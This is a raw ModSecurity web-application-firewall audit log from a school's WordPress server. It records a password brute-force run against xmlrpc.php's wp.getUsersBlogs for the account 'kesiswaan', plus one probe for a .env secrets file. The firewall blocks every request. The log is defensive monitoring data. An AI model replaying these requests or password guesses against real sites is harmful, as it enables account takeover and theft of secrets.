OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --463c1073-Z-- --3aca805b-A-- [19/Apr/2025:23:38:19 +0700] aAPRe3Na4dA2HllpK_PoXgAAAIY 103.236.140.4 41314 103.236.140.4 8181 --3aca805b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3aca805b-C-- wp.getUsersBlogs kesiswaan kesiswaan@2020 --3aca805b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3aca805b-E-- --3aca805b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080699927292 5241 (- - -) Stopwatch2: 1745080699927292 5241; combined=3823, p1=439, p2=3216, p3=0, p4=0, p5=98, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3aca805b-Z-- --d2d80125-A-- [19/Apr/2025:23:39:22 +0700] aAPRug6cTFSgLAHl7PpPfwAAAAo 103.236.140.4 41620 103.236.140.4 8181 --d2d80125-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d2d80125-C-- wp.getUsersBlogs kesiswaan 1qazxsw2 --d2d80125-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2d80125-E-- --d2d80125-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080762487967 5204 (- - -) Stopwatch2: 1745080762487967 5204; combined=3812, p1=458, p2=3178, p3=0, p4=0, p5=103, sr=100, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2d80125-Z-- --3163232a-A-- [19/Apr/2025:23:39:50 +0700] aAPR1nNa4dA2HllpK_PomAAAAI0 103.236.140.4 41746 103.236.140.4 8181 --3163232a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.59.160.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Accept: */* --3163232a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3163232a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745080790135423 684 (- - -) Stopwatch2: 1745080790135423 684; combined=283, p1=246, p2=0, p3=0, p4=0, p5=36, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3163232a-Z-- --b9407134-A-- [19/Apr/2025:23:40:23 +0700] aAPR90ruoUXZj665VUFzaQAAANY 103.236.140.4 41912 103.236.140.4 8181 --b9407134-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b9407134-C-- wp.getUsersBlogs kesiswaan Beast3x@8*#4@! --b9407134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9407134-E-- --b9407134-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080823301577 5952 (- - -) Stopwatch2: 1745080823301577 5952; combined=4000, p1=480, p2=3347, p3=0, p4=0, p5=103, sr=93, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9407134-Z-- --5700c234-A-- [19/Apr/2025:23:41:24 +0700] aAPSNHNa4dA2HllpK_PoxgAAAIc 103.236.140.4 42200 103.236.140.4 8181 --5700c234-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5700c234-C-- wp.getUsersBlogs kesiswaan kesiswaan1984 --5700c234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5700c234-E-- --5700c234-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080884453232 5814 (- - -) Stopwatch2: 1745080884453232 5814; combined=4139, p1=503, p2=3451, p3=0, p4=0, p5=107, sr=87, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5700c234-Z-- --359f0560-A-- [19/Apr/2025:23:42:29 +0700] aAPSdUruoUXZj665VUFzoQAAAM4 103.236.140.4 42540 103.236.140.4 8181 --359f0560-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --359f0560-C-- wp.getUsersBlogs kesiswaan 1111111111 --359f0560-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --359f0560-E-- --359f0560-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745080949278165 5844 (- - -) Stopwatch2: 1745080949278165 5844; combined=4111, p1=496, p2=3428, p3=0, p4=0, p5=109, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --359f0560-Z-- --04266510-A-- [19/Apr/2025:23:43:30 +0700] aAPSsuvDiFC_ir7MDwZT_QAAAEQ 103.236.140.4 42832 103.236.140.4 8181 --04266510-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --04266510-C-- wp.getUsersBlogs kesiswaan scooter --04266510-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04266510-E-- --04266510-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081010556498 5356 (- - -) Stopwatch2: 1745081010556498 5356; combined=3954, p1=463, p2=3303, p3=0, p4=0, p5=111, sr=88, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04266510-Z-- --c251232c-A-- [19/Apr/2025:23:44:30 +0700] aAPS7nNa4dA2HllpK_Po7gAAAJM 103.236.140.4 43128 103.236.140.4 8181 --c251232c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c251232c-C-- wp.getUsersBlogs kesiswaan Marketing2016_ --c251232c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c251232c-E-- --c251232c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081070180787 5533 (- - -) Stopwatch2: 1745081070180787 5533; combined=3928, p1=508, p2=3253, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c251232c-Z-- --e7350202-A-- [19/Apr/2025:23:45:34 +0700] aAPTLnNa4dA2HllpK_PpBAAAAIA 103.236.140.4 43456 103.236.140.4 8181 --e7350202-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e7350202-C-- wp.getUsersBlogs kesiswaan Marketing2013 --e7350202-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7350202-E-- --e7350202-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081134612735 5367 (- - -) Stopwatch2: 1745081134612735 5367; combined=4048, p1=497, p2=3372, p3=0, p4=0, p5=104, sr=88, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7350202-Z-- --6ff17765-A-- [19/Apr/2025:23:46:36 +0700] aAPTbEruoUXZj665VUFz_wAAANM 103.236.140.4 43784 103.236.140.4 8181 --6ff17765-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6ff17765-C-- wp.getUsersBlogs kesiswaan marketing2012_ --6ff17765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ff17765-E-- --6ff17765-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081196222589 5627 (- - -) Stopwatch2: 1745081196222589 5627; combined=3918, p1=513, p2=3144, p3=0, p4=0, p5=150, sr=130, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ff17765-Z-- --20bb1a09-A-- [19/Apr/2025:23:47:38 +0700] aAPTqkruoUXZj665VUF0JAAAANI 103.236.140.4 44076 103.236.140.4 8181 --20bb1a09-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --20bb1a09-C-- wp.getUsersBlogs kesiswaan kesiswaan@1994 --20bb1a09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20bb1a09-E-- --20bb1a09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081258133573 5660 (- - -) Stopwatch2: 1745081258133573 5660; combined=3965, p1=497, p2=3298, p3=0, p4=0, p5=100, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20bb1a09-Z-- --415abe46-A-- [19/Apr/2025:23:48:38 +0700] aAPT5kruoUXZj665VUF0PQAAAM8 103.236.140.4 44404 103.236.140.4 8181 --415abe46-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --415abe46-C-- wp.getUsersBlogs kesiswaan kesiswaan@2002 --415abe46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --415abe46-E-- --415abe46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081318286639 5573 (- - -) Stopwatch2: 1745081318286639 5573; combined=3930, p1=492, p2=3270, p3=0, p4=0, p5=99, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --415abe46-Z-- --af205d40-A-- [19/Apr/2025:23:49:44 +0700] aAPUKEruoUXZj665VUF0SQAAAMA 103.236.140.4 44696 103.236.140.4 8181 --af205d40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --af205d40-C-- wp.getUsersBlogs kesiswaan scotland --af205d40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af205d40-E-- --af205d40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081384480605 5378 (- - -) Stopwatch2: 1745081384480605 5378; combined=4024, p1=486, p2=3370, p3=0, p4=0, p5=99, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af205d40-Z-- --1882aa16-A-- [19/Apr/2025:23:50:48 +0700] aAPUaA6cTFSgLAHl7PpQbAAAAAU 103.236.140.4 45040 103.236.140.4 8181 --1882aa16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1882aa16-C-- wp.getUsersBlogs kesiswaan bethany --1882aa16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1882aa16-E-- --1882aa16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081448900476 5621 (- - -) Stopwatch2: 1745081448900476 5621; combined=4002, p1=487, p2=3345, p3=0, p4=0, p5=100, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1882aa16-Z-- --069caf1b-A-- [19/Apr/2025:23:51:49 +0700] aAPUpUruoUXZj665VUF0dAAAAMk 103.236.140.4 45336 103.236.140.4 8181 --069caf1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --069caf1b-C-- wp.getUsersBlogs kesiswaan astonvilla --069caf1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --069caf1b-E-- --069caf1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081509969827 5548 (- - -) Stopwatch2: 1745081509969827 5548; combined=3878, p1=492, p2=3224, p3=0, p4=0, p5=96, sr=94, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --069caf1b-Z-- --55cec335-A-- [19/Apr/2025:23:52:50 +0700] aAPU4uvDiFC_ir7MDwZU5wAAAEI 103.236.140.4 45646 103.236.140.4 8181 --55cec335-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --55cec335-C-- wp.getUsersBlogs kesiswaan Admin098123 --55cec335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55cec335-E-- --55cec335-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745081570040016 5739 (- - -) Stopwatch2: 1745081570040016 5739; combined=4093, p1=516, p2=3387, p3=0, p4=0, p5=110, sr=89, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" 